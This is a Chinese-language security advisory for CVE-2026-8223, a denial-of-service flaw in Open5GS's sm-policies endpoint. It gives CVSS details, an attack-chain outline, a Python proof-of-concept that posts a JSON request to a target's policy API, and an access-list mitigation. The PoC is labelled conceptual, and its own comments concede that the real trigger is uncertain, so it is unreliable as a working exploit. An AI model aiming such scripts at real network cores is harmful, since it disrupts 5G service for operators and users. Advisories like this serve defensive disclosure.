CVE-2026-8223 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8223

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及以下版本中的sm-policies端点pcf_sess_sbi_discover_and_send函数存在漏洞。攻击者可远程发起攻击，通过发送恶意数据包操纵该组件，导致服务崩溃或不可用。该漏洞无需认证和用户交互即可利用，目前利用代码已公开，官方尚未修复。

技术细节

该漏洞源于Open5GS项目中pcf_sess_sbi_discover_and_send函数在处理sm-policies端点请求时存在逻辑缺陷。攻击者无需用户认证，即可通过网络向受影响组件发送特制的数据包。由于函数未对输入进行充分的验证或异常处理，这种操作会触发系统错误，导致资源耗尽或进程异常终止。CVSS 3.1向量为AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L，表明这是一个低权限要求、无交互的远程可用性攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找暴露的Open5GS实例，特别是其sm-policies API端点。

STEP 2

武器化

攻击者构造针对pcf_sess_sbi_discover_and_send函数的恶意HTTP请求或数据包。

STEP 3

交付

无需认证，攻击者直接通过网络向目标端点发送恶意请求。

STEP 4

利用

目标系统处理请求时触发漏洞，导致相关进程处理异常或资源耗尽。

STEP 5

影响

Open5GS服务停止响应或崩溃，造成拒绝服务，影响5G核心网功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-8223 (Conceptual)
# Target: Open5GS sm-policies endpoint
# Author: Security Analyst

import requests
import sys

def trigger_dos(target_ip, target_port):
    # Endpoint vulnerable in Open5GS <= 2.7.7
    url = f"http://{target_ip}:{target_port}/npcf-smpolicy/v2/sm-policies"
    
    # Crafted payload to trigger pcf_sess_sbi_discover_and_send issue
    # The specific malformed structure depends on the exact parser flaw
    payload = {
        "ipv4Address": "10.0.0.1",
        "dnn": "internet",
        "servingNetwork": {"mcc": "001", "mnc": "01"},
        "subscriptionId": {"imsi": "001010000000001"},
        # Potential trigger for the manipulation mentioned
        "requestIndication": {"reportType": ["URR"]} 
    }

    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json"
    }

    try:
        print(f"[*] Sending payload to {url}...")
        response = requests.post(url, json=payload, headers=headers, timeout=5)
        print(f"[+] Response Code: {response.status_code}")
        # If the service crashes, subsequent packets will be dropped
    except requests.exceptions.RequestException as e:
        print(f"[!] Service may have crashed or connection refused: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_8223.py <IP> <PORT>")
    else:
        trigger_dos(sys.argv[1], sys.argv[2])

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于官方尚未发布补丁，建议用户通过访问控制列表（ACL）限制对Open5GS API接口的访问源，仅允许内部受信任的IP地址连接。同时，应密切监控系统日志，若发现sm-policies端点出现异常错误或服务中断，应及时排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8223
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8223
3 Details https://www.cvedetails.com/cve/CVE-2026-8223/
4 VulDB https://vuldb.com/cve/CVE-2026-8223
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4438
7 Link https://vuldb.com/submit/808442
8 Link https://vuldb.com/vuln/362440
9 Link https://vuldb.com/vuln/362440/cti
10 Link https://vuldb.com/submit/808442